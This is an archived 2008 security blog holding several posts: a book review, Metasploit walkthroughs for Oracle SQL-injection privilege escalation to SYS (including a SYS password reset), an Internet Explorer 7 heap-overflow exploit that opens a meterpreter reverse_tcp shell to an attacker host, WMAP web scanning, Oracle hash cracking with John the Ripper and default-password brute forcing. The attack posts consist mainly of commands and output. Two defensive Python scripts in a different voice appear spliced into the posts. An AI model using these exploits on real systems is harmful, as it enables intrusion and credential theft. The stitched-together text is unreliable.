Thursday, December 25, 2008

The Truth About Identity Theft Book Review

by Jim Stickley

4 stars

Witty (Hopefully) Amazon Title: Digestible Truths to Protect Yourself from Identity Theft

When this book showed up (review copy) I initially thought, what a piece of garbage. Like a previous commenter said, the book has a lackluster cover and it's small and skinny.
BUT, I flipped through and noticed that it contained lots of little "truths", 3-4 pages in length, that quickly covered specific topics related to identity theft and protecting yourself online. So I decided to give it a shot.

The book is broken into 9 parts:

Part 1: The Truth About Phishing and Vishing
Part 2: The Truth About Trash
Part 3: The Truth About No-Tech Identity Theft
Part 4: The Truth About Just How Low Identity Thieves Will Go
Part 5: The Truth About Identity Theft in Plain Sight
Part 6: The Truth About Online Cons
Part 7: The Truth About Security at Work
Part 8: The Truth About Identity Theft from Real Victims
Part 9: The Truth About Putting a Stop to Identity Theft

Again, each part consists of several 3-4 page vignettes on topics related to the section, and each vignette, while short, yields some actionable information on the topic. I didn't have any specific favorites; they were all good. Just about all of them were real-world examples that the author conducted during security assessments, or real-life examples from people that had contacted the author or stories he had heard. It's sometimes much easier to empathize with Susan, who was a victim of identity theft, and the troubles she was having trying to set things right. Of real value was the part on Putting a Stop to Identity Theft, which tells you how to get rid of the pre-certified credit card offers, how to check your credit reports, actions to take if you are a victim of identity theft, and some of the pitfalls that can come up during the process.

So why 4 stars? Well, mostly because I review technical security books, and it wouldn't be fair to give a less technical book that doesn't yield "new" (but still useful) information 5 stars when other, more technical books are graded much harsher. That being said, if I had approached it as a less technical reviewer I would have easily given it 5 stars. If you want to get a book for mom and dad to help them protect themselves from themselves and the rest of the bad guys out there, this is the book for them. Unfortunately I finished it too close to Xmas to give copies as gifts.


Monday, December 22, 2008

Oracle Pwnage Part 6 from DBA to SYS

In some of the past posts I covered finding a default user account, or an account with an easy-to-guess username/password, for Oracle and taking that user to DBA via SQL injection in Oracle packages.

I've been neglecting the blog a bit while porting some of the public SQLI for Oracle into Metasploit auxiliary modules. Not sure when it's going to be put into the trunk, but it will be at some point; I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, it being the week of Christmas or whatever you celebrate, I thought I'd put out a module for a vulnerability that has a public advisory but no public exploit code.

So...coverage for:
http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.
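The advisory's impact statement turns on who holds EXECUTE on SYS.DBMS_DEFER_SYS, and in Oracle that can arrive through nested role grants, not just direct grants. The following is an added example (not from the post or the module) that computes the reachable users from exported DBA_ROLE_PRIVS, DBA_TAB_PRIVS and DBA_SYS_PRIVS rows; the rows, user names and the DBA-to-EXECUTE_CATALOG_ROLE path are constructed for illustration, so pull the real rows from your own instance.

```python
from collections import defaultdict

PACKAGE = ("SYS", "DBMS_DEFER_SYS")

# Constructed sample rows in the shape of the Oracle data-dictionary views.
# DBA_ROLE_PRIVS: (grantee, granted_role); roles may be granted to roles.
ROLE_PRIVS = [
    ("HACKER", "DBA"), ("DBA", "EXECUTE_CATALOG_ROLE"),
    ("WEBAPP", "APP_ROLE"), ("REPORTING", "WEBAPP_ROLE"),
    ("WEBAPP_ROLE", "APP_ROLE"), ("SCOTT", "CONNECT"),
]
# DBA_TAB_PRIVS: (grantee, owner, table_name, privilege)
TAB_PRIVS = [
    ("EXECUTE_CATALOG_ROLE", "SYS", "DBMS_DEFER_SYS", "EXECUTE"),
    ("APP_ROLE", "SYS", "DBMS_DEFER_SYS", "EXECUTE"),
    ("REPADMIN", "SYS", "DBMS_DEFER_SYS", "EXECUTE"),
    ("PUBLIC", "SYS", "DBMS_OUTPUT", "EXECUTE"),
]
# DBA_SYS_PRIVS: (grantee, privilege)
SYS_PRIVS = [("DBA", "EXECUTE ANY PROCEDURE"), ("BATCH", "EXECUTE ANY PROCEDURE")]
# DBA_USERS.USERNAME (constructed)
USERS = ["HACKER", "WEBAPP", "REPORTING", "REPADMIN", "SCOTT", "BATCH"]


def effective_roles(grantee, role_privs=ROLE_PRIVS):
    """Every role reachable from grantee, following role-to-role grants."""
    direct = defaultdict(set)
    for g, r in role_privs:
        direct[g].add(r)
    seen, todo = set(), [grantee]
    while todo:
        for r in direct[todo.pop()]:
            if r not in seen:
                seen.add(r)
                todo.append(r)
    return seen


def execute_paths(user, o7_dictionary_accessible=False):
    """Grant paths by which user can EXECUTE the target package.

    Direct grants, grants to PUBLIC and grants to any held role count.
    EXECUTE ANY PROCEDURE only reaches SYS-owned objects when the instance
    runs with O7_DICTIONARY_ACCESSIBILITY=TRUE, so it is counted only then.
    """
    principals = {user, "PUBLIC"} | effective_roles(user)
    paths = []
    for grantee, owner, name, priv in TAB_PRIVS:
        if (owner, name) == PACKAGE and priv == "EXECUTE" and grantee in principals:
            paths.append(f"EXECUTE granted to {grantee}")
    if o7_dictionary_accessible:
        for grantee, priv in SYS_PRIVS:
            if priv == "EXECUTE ANY PROCEDURE" and grantee in principals:
                paths.append(f"EXECUTE ANY PROCEDURE granted to {grantee}")
    return paths


def exposed_users(users=USERS, o7_dictionary_accessible=False):
    """Map each user that can reach the package to its grant paths."""
    return {u: p for u in users if (p := execute_paths(u, o7_dictionary_accessible))}


if __name__ == "__main__":
    for user, paths in exposed_users().items():
        print(f"{user}: {', '.join(paths)}")
```

Anyone the script lists who does not administer replication is a candidate for a REVOKE, and the package itself gets the vendor patch referenced in the advisory.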

Let's see it in action, assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER DBA NO YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select user from dual;

USER
------------------------------
SYS

SQL>

Tested on 9i and 10g release 1

codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb

It's definitely a work in progress, so if you have feedback, send it.

Missing Add Remove Icon in Windows

Not really security related but notes for me if it comes up again...

I was doing some incident response on a Windows 2003 server and needed to verify the service pack level and installed KBs via the Add/Remove Programs applet, but the icon was missing.

Found the answer on how to launch it directly: Start --> Run --> appwiz.cpl

http://en.kioskea.net/faq/sujet-465-the-add-remove-programs-icon-is-missing-in-control-panel


Thursday, December 11, 2008

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time figuring it out. It's pretty straightforward though. If you want to know more about how it works, HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the XML, which ends up corrupting the heap. See HD's post for the exact details. Every time I add code to my posts it screws something up, so no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an initial PoC working, but it was not stable and only triggered on XP, as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use. He also added target detection based on the User-Agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even so, when I tested last night and this morning it seemed to be hit or miss on XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate on the heap, the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
msf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational, to say the least. I learned a lot from the debugging and testing. Cheers mc!!

Now all I need is a target... ;)

Cheers,
/dean

**edit
IE7 Zero Day Technical Analysis


Sunday, December 7, 2008

Congrats To My Aura Software Security Friends

Just wanted to give a big congrats to my Aura Software Security friends over in New Zealand for the good things I'm hearing about their Netscreen hacking talk.

"Netscreen of the Dead: Developing a Trojaned Firmware for Juniper Netscreen Appliances"

http://www.ruxcon.org.au/files/2008/gn-netscreen-of-the-dead.ppt


http://www.zdnet.com.au/news/security/soa/Ruxcon-security-gurus-hit-Sydney/0,130061744,339293503,00.htm

Monday, November 24, 2008

Metasploit and WMAP

What is WMAP

"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not built around any browser or spider for data capture and manipulation."

Getting it all up & running

Readme is here:
http://www.metasploit.com/dev/trac/browser/framework3/trunk/documentation/wmap.txt

Step 1: Download, patch, and install ratproxy
http://code.google.com/p/ratproxy/

Documentation: http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Code (at time of this posting): http://ratproxy.googlecode.com/files/ratproxy-1.51.tar.gz

Step 2: Run ratproxy and browse the site you are targeting; this will populate the database you will use/need for wmap.

**You'll need to create the database first.

msf > db_create wmaptest.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: wmaptest.db


Step 3: Run metasploit, load necessary plugins, and run the wmap modules.

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_connect wmaptest.db
[*] Successfully connected to the database
[*] File: wmaptest.db


Show the targets. This is populated by browsing a site with ratproxy.


msf > wmap_targets
[*] Usage: wmap_targets [options]
-h Display this help text
-p Print all available targets
-r Reload targets table
-s [id] Select target for testing

msf > wmap_targets -r
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0

msf > wmap_targets -p
[*] Id. Host Port SSL
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0
[*] Done.



Select a target and run the print command again to ensure the right target was selected.


msf > wmap_targets -s 1
Host Port SSL

[*] => 1. 192.168.0.100 80

[*] 2. 64.233.187.99 80

[*] Done.


Display the website structure.

msf > wmap_website
[*] Website structure
[*] 192.168.0.100:80 SSL:0
ROOT_TREE
| web
| | css
| | +------gonav.css
| | web
| | | images
| | | +------storepic_4.jpg
| | | +------storepic_264.jpg
| | | +------20080717105615.jpg
| | | +------storepic_125.jpg
| | +------index.php
| | | pic
| | | | part
| | | | +------index_line_1.gif
| | | +------top_index.gif
| | | +------username.gif
| | | +------tail_bg.gif
| | | +------head_bg.gif
| | | +------login_bg.gif
[*] Done.



[*] Usage: wmap_run [options]
-h Display this help text
-t Show all matching exploit modules
-e Launch exploits against all matched targets


Show the available modules for wmap

msf > wmap_run -t
[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/options ...
[*] Loaded auxiliary/scanner/http/frontpage ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Analysis completed in 1.30465912818909 seconds.
[*] Done.


Run wmap, then go get a (rum &) coke, because the brute-force directory modules are going to take a while.

msf > wmap_run -e
[*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 192.168.0.100:80
[*] Error: 192.168.0.100
[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80/ may not support FrontPage Server Extensions
[*] Launching auxiliary/scanner/http/version WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 is running Apache/2.2.3 (CentOS)( Powered by PHP/5.1.6 )
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 192.168.0.100:80
[*] >> Exception during launch from auxiliary/scanner/http/wmap_vhost_scanner: The following options failed to validate: DOMAIN.
[*] Launching auxiliary/scanner/http/options WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80 is running Apache/2.2.3 (CentOS)
[*] FrontPage not found on http://192.168.0.100:80 [404 Not Found]
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR / against 192.168.0.100:80...
[-] Blank or default PATH set.
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR /web/ against 192.168.0.100:80...

---SNIP---

msf > wmap_reports
[*] Usage: wmap_reports [options]
-h Display this help text
-p Print all available reports
-s [id] Select report for display


Show available reports.

msf > wmap_reports -p
[*] Id. Created Target (host,port,ssl)

1. Sat Nov 22 22:37:04 -0500 2008 192.168.0.100,80,0

[*] Done.


Show your report.

msf > wmap_reports -s 1
WMAP REPORT: 192.168.0.100,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
WEB_SERVER OPTIONS: GET,HEAD,POST,OPTIONS,TRACE [Sat Nov 22 22:37:07 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /administrator/ Directory /administrator/ found. [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /class/ Directory /class/ found. [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY NAME: /db/ Directory /db/ found. [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY NAME: /error/ Directory /error/ found. [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY NAME: /icons/ Directory /icons/ found. [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY NAME: /includes/ Directory /includes/ found. [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY NAME: /js/ Directory /js/ found. [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY NAME: /manual/ Directory /manual/ found. [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY NAME: /template/ Directory /template/ found. [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY NAME: /upload/ Directory /upload/ found. [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY NAME: /usage/ Directory /usage/ found. [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY NAME: /web/class/ Directory /web/class/ found. [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY NAME: /web/css/ Directory /web/css/ found. [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY NAME: /web/db/ Directory /web/db/ found. [Sat Nov 22 23:01:26 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:26 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY DIR_LISTING: /web/web/pic/ Directory /web/web/pic/ discloses its contents. [Sat Nov 22 23:02:40 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.
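The report above is line-oriented and easy to turn into a findings list, which helps when several targets have been scanned. Here is an added example (not part of WMAP or the post) that parses a trimmed copy of the report lines shown above and ranks what it finds; the severity ordering and the set of methods treated as risky are my own choices, not WMAP's.

```python
import re

# Report lines copied from the wmap_reports output above (trimmed to a subset).
SAMPLE_REPORT = """\
WMAP REPORT: 192.168.0.100,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
WEB_SERVER OPTIONS: GET,HEAD,POST,OPTIONS,TRACE [Sat Nov 22 22:37:07 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.
"""

# KIND FIELD: value [optional free-text detail] [timestamp]
LINE = re.compile(r"^(\w+) (\w+): (\S+)(?: (.*?))? \[(.*?)\]$")

# Constructed triage ranking: a writable webroot outranks a directory listing.
SEVERITY = {"PUT_ENABLED": "high", "DIR_LISTING": "medium"}
RANK = ["high", "medium", "info"]
RISKY_METHODS = {"PUT", "DELETE", "TRACE"}


def parse_report(text):
    """Turn report lines into (kind, field, value, detail, timestamp) tuples."""
    rows = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            kind, field, value, detail, ts = m.groups()
            rows.append((kind, field, value, detail or "", ts))
    return rows


def triage(text):
    """Summarise one report: server, risky methods, found dirs, ranked vulns."""
    summary = {"target": None, "server": None, "risky_methods": [],
               "directories": {}, "vulns": []}
    pending_dir = None  # DIRECTORY NAME is followed by its RESP_CODE line
    for kind, field, value, detail, _ts in parse_report(text):
        if kind == "WMAP" and field == "REPORT":
            summary["target"] = value
        elif kind == "WEB_SERVER" and field == "TYPE":
            summary["server"] = f"{value} {detail}".strip()
        elif kind == "WEB_SERVER" and field == "OPTIONS":
            summary["risky_methods"] = sorted(RISKY_METHODS & set(value.split(",")))
        elif kind == "DIRECTORY" and field == "NAME":
            pending_dir = value
        elif kind == "DIRECTORY" and field == "RESP_CODE" and pending_dir:
            summary["directories"][pending_dir] = int(value)
            pending_dir = None
        elif kind == "VULNERABILITY":
            summary["vulns"].append({"type": field, "path": value, "detail": detail,
                                     "severity": SEVERITY.get(field, "info")})
    summary["vulns"].sort(key=lambda v: RANK.index(v["severity"]))
    return summary


if __name__ == "__main__":
    for v in triage(SAMPLE_REPORT)["vulns"]:
        print(f"[{v['severity']}] {v['type']} {v['path']}: {v['detail']}")
```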


Finish your pwnage...errr pentest.

Sunday, November 23, 2008

Getting your smartcard to work with Ubuntu

The big bummer of Common Access Cards (CAC) is that there hasn't been a really good solution to get them working in Linux. I've seen it done for OS X but not for Linux. Well, the guys over at HR Geeks did a writeup on how to get it working; worth a look if you have made the jump to being full-time Linux.

http://www.hrgeeks.com/2008/11/21/using-a-dod-cac-with-ubuntu-and-firefox/

Oracle Pwnage Part 5 -- Password Cracking with JTR

Thanks to dentonj for pointing out to me that there was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...


Saturday, November 22, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 4

Thanks to MC for this one...

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130

RHOST => 172.16.102.130

msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$

Provided by:
MC

Basic options:

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  172.16.102.130   yes       The Oracle host.
RPORT  1521             yes       The TNS port.
SID    DEMO             yes       The sid to authenticate with.

Description:
This module uses a list of well known authentication credentials for
bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable

SID => unbreakable

msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >

Friday, November 21, 2008

Metasploit Adobe util.printf() Client-side Exploit Video

A little video on using the fileformat mixin to exploit the adobe util.printf() vulnerability.

Sorry, no audio. You'll just have to follow along.


Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.

**P.S. Something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again, and it should play at the proper speed. You can also click the link below the video for a bigger view.